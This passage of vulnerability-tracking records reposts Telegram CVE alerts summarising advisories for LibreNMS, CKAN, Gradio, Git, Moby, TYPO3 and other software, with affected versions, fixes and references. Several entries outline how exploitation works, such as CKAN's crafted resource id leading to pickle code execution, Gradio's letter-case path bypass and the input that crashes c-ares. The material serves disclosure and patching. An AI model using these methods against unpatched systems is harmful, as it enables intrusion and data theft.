"GHSA-PM8J-3V64-92CQ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2070", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23198\n\ud83d\udd39 Description: librenms is a community-based GPL-licensed network monitoring system. Affected versions are subject to a stored XSS on the parameters (Replace $DEVICE_ID with your specific $DEVICE_ID value):`/device/$DEVICE_ID/edit` -&gt; param: display. Librenms versions up to 24.10.1 allow remote attackers to inject malicious scripts. When a user views or interacts with the page displaying the data, the malicious script executes immediately, leading to potential unauthorized actions or data exposure. This issue has been addressed in release version 24.11.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-16T22:26:25.873Z\n\ud83d\udccf Modified: 2025-01-16T22:26:25.873Z\n\ud83d\udd17 References:\n1. https://github.com/librenms/librenms/security/advisories/GHSA-pm8j-3v64-92cq", "creation_timestamp": "2025-01-16T22:56:25.000000Z"}, {"uuid": "0f210ed0-b58f-49d3-a6ea-cfcc96f86ec5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C66P-64FJ-JMC2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2074", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23200\n\ud83d\udd39 Description: librenms is a community-based GPL-licensed network monitoring system. Affected versions are subject to a stored XSS on the parameter: `ajax_form.php` -&gt; param: state. Librenms versions up to 24.10.1 allow remote attackers to inject malicious scripts. When a user views or interacts with the page displaying the data, the malicious script executes immediately, leading to potential unauthorized actions or data exposure. This issue has been addressed in release version 24.11.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-16T22:20:51.907Z\n\ud83d\udccf Modified: 2025-01-16T22:20:51.907Z\n\ud83d\udd17 References:\n1. https://github.com/librenms/librenms/security/advisories/GHSA-c66p-64fj-jmc2", "creation_timestamp": "2025-01-16T22:56:31.000000Z"}, {"uuid": "3bb22cb2-d783-412b-838b-f88bbdf4feea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FQMF-W4XH-33RH", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/2367", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22620\n\ud83d\udd39 Description: gitoxide is an implementation of git written in Rust. Prior to 0.17.0, gix-worktree-state specifies 0777 permissions when checking out executable files, intending that the umask will restrict them appropriately. But one of the strategies it uses to set permissions is not subject to the umask. This causes files in a repository to be world-writable in some situations. This vulnerability is fixed in 0.17.0.\n\ud83d\udccf Published: 2025-01-20T15:38:32.388Z\n\ud83d\udccf Modified: 2025-01-20T15:38:32.388Z\n\ud83d\udd17 References:\n1. https://github.com/GitoxideLabs/gitoxide/security/advisories/GHSA-fqmf-w4xh-33rh", "creation_timestamp": "2025-01-20T16:01:48.000000Z"}, {"uuid": "41d62d26-8bcb-4be4-afed-6532e138efc6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X5MQ-JJR3-VMX6", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/2408", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24013\n\ud83d\udd39 Description: CodeIgniter is a PHP full-stack web framework. Prior to 4.5.8, CodeIgniter lacked proper header validation for its name and value. The potential attacker can construct deliberately malformed headers with Header class. This could disrupt application functionality, potentially causing errors or generating invalid HTTP requests. In some cases, these malformed requests might lead to a DoS scenario if a remote service\u2019s web application firewall interprets them as malicious and blocks further communication with the application. This vulnerability is fixed in 4.5.8.\n\ud83d\udccf Published: 2025-01-20T15:57:37.975Z\n\ud83d\udccf Modified: 2025-01-21T14:51:01.754Z\n\ud83d\udd17 References:\n1. https://github.com/codeigniter4/CodeIgniter4/security/advisories/GHSA-x5mq-jjr3-vmx6\n2. https://github.com/codeigniter4/CodeIgniter4/commit/5f8aa24280fb09947897d6b322bf1f0e038b13b6\n3. https://datatracker.ietf.org/doc/html/rfc7230#section-3.2\n4. https://github.com/advisories/GHSA-wxmh-65f7-jcvw", "creation_timestamp": "2025-01-21T15:00:43.000000Z"}, {"uuid": "da9eaf11-eaea-4a64-9a5e-830b107e8245", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X6MF-CXR9-8Q6V", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/2008", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-31130\n\ud83d\udd39 Description: c-ares is an asynchronous resolver library. ares_inet_net_pton() is vulnerable to a buffer underflow for certain ipv6 addresses, in particular \"0::00:00:00/2\" was found to cause an issue.  C-ares only uses this function internally for configuration purposes which would require an administrator to configure such an address via ares_set_sortlist(). However, users may externally use ares_inet_net_pton() for other purposes and thus be vulnerable to more severe issues. This issue has been fixed in 1.19.1.\n\n\ud83d\udccf Published: 2023-05-25T21:45:42.645Z\n\ud83d\udccf Modified: 2025-01-16T18:35:44.800Z\n\ud83d\udd17 References:\n1. https://github.com/c-ares/c-ares/security/advisories/GHSA-x6mf-cxr9-8q6v\n2. https://github.com/c-ares/c-ares/releases/tag/cares-1_19_1\n3. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B5Z5XFNXTNPTCBBVXFDNZQVLLIE6VRBY/\n4. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UBFWILTA33LOSV23P44FGTQQIDRJHIY7/\n5. https://www.debian.org/security/2023/dsa-5419\n6. https://lists.debian.org/debian-lts-announce/2023/06/msg00034.html\n7. https://security.gentoo.org/glsa/202310-09\n8. https://security.netapp.com/advisory/ntap-20240605-0005/", "creation_timestamp": "2025-01-16T18:56:19.000000Z"}, {"uuid": "e728c4e1-b4e2-4300-909a-ad94926485ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-27VF-3G4F-6JP7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23199\n\ud83d\udd39 Description: librenms is a community-based GPL-licensed network monitoring system. Affected versions are subject to a stored XSS on the parameter: `/ajax_form.php` -&gt; param: descr. Librenms version up to 24.10.1 allow remote attackers to inject malicious scripts. When a user views or interacts with the page displaying the data, the malicious script executes immediately, leading to potential unauthorized actions or data exposure. This issue has been addressed in release version 24.11.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-16T22:23:48.323Z\n\ud83d\udccf Modified: 2025-01-16T22:23:48.323Z\n\ud83d\udd17 References:\n1. https://github.com/librenms/librenms/security/advisories/GHSA-27vf-3g4f-6jp7", "creation_timestamp": "2025-01-16T22:56:26.000000Z"}, {"uuid": "91b12c95-3c9a-4b78-8b3b-4de6a7b15378", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M8GJ-6R85-3R6M", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2020", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-55954\n\ud83d\udd39 Description: OpenObserve is a cloud-native observability platform. A vulnerability in the user management endpoint `/api/{org_id}/users/{email_id}` allows an \"Admin\" role user to remove a \"Root\" user from the organization. This violates the intended privilege hierarchy, enabling a non-root user to remove the highest-privileged account. Due to insufficient role checks, the `remove_user_from_org` function does not prevent an \"Admin\" user from removing a \"Root\" user. As a result, an attacker with an \"Admin\" role can remove critical \"Root\" users, potentially gaining effective full control by eliminating the highest-privileged accounts. The `DELETE /api/{org_id}/users/{email_id}` endpoint is affected. This issue has been addressed in release version `0.14.1` and all users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-16T19:30:39.218Z\n\ud83d\udccf Modified: 2025-01-16T19:30:39.218Z\n\ud83d\udd17 References:\n1. https://github.com/openobserve/openobserve/security/advisories/GHSA-m8gj-6r85-3r6m\n2. https://github.com/gaby/openobserve/blob/main/src/service/users.rs#L631", "creation_timestamp": "2025-01-16T19:56:03.000000Z"}, {"uuid": "4ceaca06-2d97-4d6b-99df-dc14366e48ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5XG8-XHFJ-4HM6", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/2024", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-56136\n\ud83d\udd39 Description: Zulip server provides an open-source team chat that helps teams stay productive and focused. Zulip Server 7.0 and above are vulnerable to an information disclose attack, where, if a Zulip server is hosting multiple organizations, an unauthenticated user can make a request and determine if an email address is in use by a user. Zulip Server 9.4 resolves the issue, as does the `main` branch of Zulip Server. Users are advised to upgrade. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2025-01-16T19:25:33.261Z\n\ud83d\udccf Modified: 2025-01-16T19:25:33.261Z\n\ud83d\udd17 References:\n1. https://github.com/zulip/zulip/security/advisories/GHSA-5xg8-xhfj-4hm6\n2. https://github.com/zulip/zulip/commit/c6334a765b1e6d71760e4a3b32ae5b8367f2ed4d", "creation_timestamp": "2025-01-16T19:56:09.000000Z"}, {"uuid": "9b9ced26-05c1-4693-afa9-7363d61dc021", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3RQJ-9V87-2X3F", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/2028", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-32694\n\ud83d\udd39 Description: Saleor Core is a composable, headless commerce API. Saleor's `validate_hmac_signature` function is vulnerable to timing attacks. Malicious users could abuse this vulnerability on Saleor deployments having the Adyen plugin enabled in order to determine the secret key and forge fake events, this could affect the database integrity such as marking an order as paid when it is not. This issue has been patched in versions 3.7.68, 3.8.40, 3.9.49, 3.10.36, 3.11.35, 3.12.25, and 3.13.16.\n\ud83d\udccf Published: 2023-05-25T14:29:10.217Z\n\ud83d\udccf Modified: 2025-01-16T19:21:54.740Z\n\ud83d\udd17 References:\n1. https://github.com/saleor/saleor/security/advisories/GHSA-3rqj-9v87-2x3f\n2. https://github.com/saleor/saleor/commit/1328274e1a3d04ab87d7daee90229ff47b3bc35e", "creation_timestamp": "2025-01-16T19:56:12.000000Z"}, {"uuid": "d0ccf67e-974f-4a0b-8f5c-3e683155e2e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-79XX-VF93-P7CX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2368", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22131\n\ud83d\udd39 Description: PhpSpreadsheet is a PHP library for reading and writing spreadsheet files. Cross-Site Scripting (XSS) vulnerability in the code which translates the XLSX file into a HTML representation and displays it in the response.\n\ud83d\udccf Published: 2025-01-20T15:31:19.693Z\n\ud83d\udccf Modified: 2025-01-20T15:31:19.693Z\n\ud83d\udd17 References:\n1. https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-79xx-vf93-p7cx\n2. https://github.com/PHPOffice/PhpSpreadsheet/commit/4088381ccfaf241d7d42c333de0dc8c98e338743", "creation_timestamp": "2025-01-20T16:01:49.000000Z"}, {"uuid": "669dabdd-ac26-4068-8e12-4c0fe94482e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4850", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2355", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-0874\n\ud83d\udd39 Description: A flaw was found in coredns. This issue could lead to invalid cache entries returning due to incorrectly implemented caching.\n\ud83d\udccf Published: 2024-04-25T16:22:44.182Z\n\ud83d\udccf Modified: 2025-01-20T09:24:54.659Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0041\n2. https://access.redhat.com/errata/RHSA-2024:4850\n3. https://access.redhat.com/errata/RHSA-2024:6009\n4. https://access.redhat.com/errata/RHSA-2024:6406\n5. https://access.redhat.com/security/cve/CVE-2024-0874\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2219234\n7. https://github.com/coredns/coredns/issues/6186\n8. https://github.com/coredns/coredns/pull/6354", "creation_timestamp": "2025-01-20T09:59:36.000000Z"}, {"uuid": "4439479c-dc1e-4d0f-aece-72240b030aaf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-446M-HMMM-HM8M", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1563", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-32321\n\ud83d\udd39 Description: CKAN is an open-source data management system for powering data hubs and data portals. Multiple vulnerabilities have been discovered in Ckan which may lead to remote code execution. An arbitrary file write in `resource_create` and `package_update` actions, using the `ResourceUploader` object.  Also reachable via `package_create`, `package_revise`, and `package_patch` via calls to `package_update`. Remote code execution via unsafe pickle loading, via Beaker's session store when configured to use the file session store backend. Potential DOS due to lack of a length check on the resource id. Information disclosure: A user with permission to create a resource can access any other resource on the system if they know the id, even if they don't have access to it. Resource overwrite: A user with permission to create a resource can overwrite any resource if they know the id, even if they don't have access to it. A user with permissions to create or edit a dataset can upload a resource with a specially crafted id to write the uploaded file in an arbitrary location. This can be leveraged to Remote Code Execution via Beaker's insecure pickle loading. All the above listed vulnerabilities have been fixed in CKAN 2.9.9 and CKAN 2.10.1. Users are advised to upgrade. There are no known workarounds for these issues.\n\ud83d\udccf Published: 2023-05-26T22:57:00.076Z\n\ud83d\udccf Modified: 2025-01-14T19:07:12.229Z\n\ud83d\udd17 References:\n1. https://github.com/ckan/ckan/security/advisories/GHSA-446m-hmmm-hm8m\n2. https://github.com/ckan/ckan/blob/2a6080e61d5601fa0e2a0317afd6a8e9b7abf6dd/CHANGELOG.rst", "creation_timestamp": "2025-01-14T19:09:21.000000Z"}, {"uuid": "caa4d8cd-475b-43aa-a4ba-df7d10208eff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QWX7-39PW-2MHR", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1591", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-55920\n\ud83d\udd39 Description: TYPO3 is a free and open source Content Management Framework. A vulnerability has been identified in the backend user interface functionality involving deep links. Specifically, this functionality is susceptible to Cross-Site Request Forgery (CSRF). Additionally, state-changing actions in downstream components incorrectly accepted submissions via HTTP GET and did not enforce the appropriate HTTP method. Successful exploitation of this vulnerability requires the victim to have an active session on the backend user interface and to be deceived into interacting with a malicious URL targeting the backend, which can occur under the following conditions: The user opens a malicious link, such as one sent via email. The user visits a compromised or manipulated website while the following settings are misconfigured: 1. `security.backend.enforceReferrer` feature is disabled, 2. `BE/cookieSameSite` configuration is set to lax or none. The vulnerability in the affected downstream component \u201cDashboard Module\u201d allows attackers to manipulate the victim\u2019s dashboard configuration. Users are advised to update to TYPO3 versions 11.5.42 ELTS, 12.4.25 LTS, 13.4.3 LTS which fix the problem described. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-14T19:55:42.459Z\n\ud83d\udccf Modified: 2025-01-14T19:55:42.459Z\n\ud83d\udd17 References:\n1. https://github.com/TYPO3/typo3/security/advisories/GHSA-qwx7-39pw-2mhr\n2. https://typo3.org/security/advisory/typo3-core-sa-2025-005", "creation_timestamp": "2025-01-14T20:08:52.000000Z"}, {"uuid": "4c565225-1673-404b-aef1-4d55f729420c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J2JG-FQ62-7C3H", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1584", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23042\n\ud83d\udd39 Description: Gradio is an open-source Python package that allows quick building of demos and web application for machine learning models, API, or any arbitrary Python function. Gradio's Access Control List (ACL) for file paths can be bypassed by altering the letter case of a blocked file or directory path. This vulnerability arises due to the lack of case normalization in the file path validation logic. On case-insensitive file systems, such as those used by Windows and macOS, this flaw enables attackers to circumvent security restrictions and access sensitive files that should be protected. This issue can lead to unauthorized data access, exposing sensitive information and undermining the integrity of Gradio's security model. Given Gradio's popularity for building web applications, particularly in machine learning and AI, this vulnerability may pose a substantial threat if exploited in production environments. This issue has been addressed in release version 5.6.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-14T18:49:16.329Z\n\ud83d\udccf Modified: 2025-01-14T18:49:16.329Z\n\ud83d\udd17 References:\n1. https://github.com/gradio-app/gradio/security/advisories/GHSA-j2jg-fq62-7c3h", "creation_timestamp": "2025-01-14T19:11:01.000000Z"}, {"uuid": "107bf62b-a173-441a-9f5b-3112fdedda38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-86C2-4X57-WC8G", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1581", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-52006\n\ud83d\udd39 Description: Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. Git defines a line-based protocol that is used to exchange information between Git and Git credential helpers. Some ecosystems (most notably, .NET and node.js) interpret single Carriage Return characters as newlines, which renders the protections against CVE-2020-5260 incomplete for credential helpers that treat Carriage Returns in this way. This issue has been addressed in commit `b01b9b8` which is included in release versions v2.48.1, v2.47.1, v2.46.3, v2.45.3, v2.44.3, v2.43.6, v2.42.4, v2.41.3, and v2.40.4. Users are advised to upgrade. Users unable to upgrade should avoid cloning from untrusted URLs, especially recursive clones.\n\ud83d\udccf Published: 2025-01-14T18:39:52.748Z\n\ud83d\udccf Modified: 2025-01-14T18:52:11.014Z\n\ud83d\udd17 References:\n1. https://github.com/git/git/security/advisories/GHSA-r5ph-xg7q-xfrp\n2. https://github.com/git-ecosystem/git-credential-manager/security/advisories/GHSA-86c2-4x57-wc8g\n3. https://github.com/git/git/security/advisories/GHSA-qm7j-c969-7j4q\n4. https://github.com/git/git/commit/b01b9b81d36759cdcd07305e78765199e1bc2060", "creation_timestamp": "2025-01-14T19:10:45.000000Z"}, {"uuid": "6f8e8566-a9ed-4628-b9e9-a08a1b191675", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QM7J-C969-7J4Q", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1581", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-52006\n\ud83d\udd39 Description: Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. Git defines a line-based protocol that is used to exchange information between Git and Git credential helpers. Some ecosystems (most notably, .NET and node.js) interpret single Carriage Return characters as newlines, which renders the protections against CVE-2020-5260 incomplete for credential helpers that treat Carriage Returns in this way. This issue has been addressed in commit `b01b9b8` which is included in release versions v2.48.1, v2.47.1, v2.46.3, v2.45.3, v2.44.3, v2.43.6, v2.42.4, v2.41.3, and v2.40.4. Users are advised to upgrade. Users unable to upgrade should avoid cloning from untrusted URLs, especially recursive clones.\n\ud83d\udccf Published: 2025-01-14T18:39:52.748Z\n\ud83d\udccf Modified: 2025-01-14T18:52:11.014Z\n\ud83d\udd17 References:\n1. https://github.com/git/git/security/advisories/GHSA-r5ph-xg7q-xfrp\n2. https://github.com/git-ecosystem/git-credential-manager/security/advisories/GHSA-86c2-4x57-wc8g\n3. https://github.com/git/git/security/advisories/GHSA-qm7j-c969-7j4q\n4. https://github.com/git/git/commit/b01b9b81d36759cdcd07305e78765199e1bc2060", "creation_timestamp": "2025-01-14T19:10:45.000000Z"}, {"uuid": "1092c23d-5d9f-4ca4-b47b-78c13bb62e4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MXHG-RVWX-X993", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1588", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-32688\n\ud83d\udd39 Description: parse-server-push-adapter is the official Push Notification adapter for Parse Server. The Parse Server Push Adapter can crash Parse Server due to an invalid push notification payload. This issue has been patched in version 4.1.3.\n\n\ud83d\udccf Published: 2023-05-27T03:21:27.071Z\n\ud83d\udccf Modified: 2025-01-14T18:43:52.475Z\n\ud83d\udd17 References:\n1. https://github.com/parse-community/parse-server-push-adapter/security/advisories/GHSA-mxhg-rvwx-x993\n2. https://github.com/parse-community/parse-server-push-adapter/pull/217\n3. https://github.com/parse-community/parse-server-push-adapter/releases/tag/4.1.3", "creation_timestamp": "2025-01-14T19:11:17.000000Z"}, {"uuid": "3b2b9efd-dc2d-4123-8ac0-934d55a64542", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7CMP-CGG8-4C82", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1634", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-47605\n\ud83d\udd39 Description: silverstripe-asset-admin is a silverstripe assets gallery for asset management. When using the \"insert media\" functionality, the linked oEmbed JSON includes an HTML attribute which will replace the embed shortcode. The HTML is not sanitized before replacing the shortcode, allowing a script payload to be executed on both the CMS and the front-end of the website. This issue has been addressed in silverstripe/framework version 5.3.8 and users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-14T22:42:31.153Z\n\ud83d\udccf Modified: 2025-01-14T22:45:00.758Z\n\ud83d\udd17 References:\n1. https://github.com/silverstripe/silverstripe-asset-admin/security/advisories/GHSA-7cmp-cgg8-4c82\n2. https://github.com/silverstripe/silverstripe-framework/commit/09b5052c86932f273e0d733428c9aade70ff2a4a\n3. https://www.silverstripe.org/download/security-releases/cve-2024-47605", "creation_timestamp": "2025-01-14T23:09:18.000000Z"}, {"uuid": "205107c3-7ae5-4f9e-94d6-26637ee8a802", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FF6Q-3C9C-6CF5", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1633", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-53277\n\ud83d\udd39 Description: Silverstripe Framework is a PHP framework which powers the Silverstripe CMS. In some cases, form messages can contain HTML markup. This is an intentional feature, allowing links and other relevant HTML markup for the given message. Some form messages include content that the user can provide. There are scenarios in the CMS where that content doesn't get correctly sanitised prior to being included in the form message, resulting in an XSS vulnerability. This issue has been addressed in silverstripe/framework version 5.3.8 and users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-14T22:45:07.403Z\n\ud83d\udccf Modified: 2025-01-14T22:45:07.403Z\n\ud83d\udd17 References:\n1. https://github.com/silverstripe/silverstripe-framework/security/advisories/GHSA-ff6q-3c9c-6cf5\n2. https://github.com/silverstripe/silverstripe-framework/commit/74904f539347b7d1f8c5b5fb9e28d62ff251ee00\n3. https://www.silverstripe.org/download/security-releases/cve-2024-53277", "creation_timestamp": "2025-01-14T23:09:10.000000Z"}, {"uuid": "b4a4609c-6af5-4f4b-b3fe-bfab6cfdc176", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-94C2-QR2H-88JV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1636", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-54142\n\ud83d\udd39 Description: Discourse AI is a Discourse plugin which provides a number of AI features. When sharing Discourse AI Bot conversations into posts, if the conversation had HTML entities those could leak into the Discourse application when a user visited a post with a onebox to said conversation. This issue has been addressed in commit `92f122c`. Users are advised to update. Users unable to update may remove all groups from `ai bot public sharing allowed groups` site setting.\n\ud83d\udccf Published: 2025-01-14T22:39:49.458Z\n\ud83d\udccf Modified: 2025-01-14T22:39:49.458Z\n\ud83d\udd17 References:\n1. https://github.com/discourse/discourse-ai/security/advisories/GHSA-94c2-qr2h-88jv\n2. https://github.com/discourse/discourse-ai/commit/92f122c54d9d7ead9223a056270bff5b4c42c73f", "creation_timestamp": "2025-01-14T23:09:31.000000Z"}, {"uuid": "9a64e590-598a-4101-8c4d-4a616acfa924", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W8XV-RWGF-4FWH", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1671", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0343\n\ud83d\udd39 Description: Swift ASN.1 can be caused to crash when parsing certain BER/DER constructions. This crash is caused by a confusion in the ASN.1 library itself which assumes that certain objects can only be provided in either constructed or primitive forms, and will trigger a preconditionFailure if that constraint isn't met.\n\nImportantly, these constraints are actually required to be true in DER, but that correctness wasn't enforced on the early node parser side so it was incorrect to rely on it later on in decoding, which is what the library did.\n\nThese crashes can be triggered when parsing any DER/BER format object. There is no memory-safety issue here: the crash is a graceful one from the Swift runtime. The impact of this is that it can be used as a denial-of-service vector when parsing BER/DER data from unknown sources, e.g. when parsing TLS certificates.\n\ud83d\udccf Published: 2025-01-15T00:48:07.959Z\n\ud83d\udccf Modified: 2025-01-15T00:48:07.959Z\n\ud83d\udd17 References:\n1. https://github.com/apple/swift-asn1/security/advisories/GHSA-w8xv-rwgf-4fwh", "creation_timestamp": "2025-01-15T01:09:58.000000Z"}, {"uuid": "05e05c40-a342-4e30-a531-e9198d7abe4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RC4R-WH2Q-Q6C4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/2127", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-36109\n\ud83d\udd39 Description: Moby is an open-source project created by Docker to enable software containerization. A bug was found in Moby (Docker Engine) where supplementary groups are not set up properly. If an attacker has direct access to a container and manipulates their supplementary group access, they may be able to use supplementary group access to bypass primary group restrictions in some cases, potentially gaining access to sensitive information or gaining the ability to execute code in that container.  This bug is fixed in Moby (Docker Engine) 20.10.18. Running containers should be stopped and restarted for the permissions to be fixed. For users unable to upgrade, this problem can be worked around by not using the `\"USER $USERNAME\"` Dockerfile instruction. Instead by calling `ENTRYPOINT [\"su\", \"-\", \"user\"]` the supplementary groups will be set up properly.\n\ud83d\udccf Published: 2022-09-09T17:20:11\n\ud83d\udccf Modified: 2025-01-17T13:07:54.013Z\n\ud83d\udd17 References:\n1. https://github.com/moby/moby/security/advisories/GHSA-rc4r-wh2q-q6c4\n2. https://github.com/moby/moby/commit/de7af816e76a7fd3fbf06bffa6832959289fba32\n3. https://github.com/moby/moby/releases/tag/v20.10.18\n4. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O7JL2QA3RB732MLJ3RMUXB3IB7AA22YU\n5. 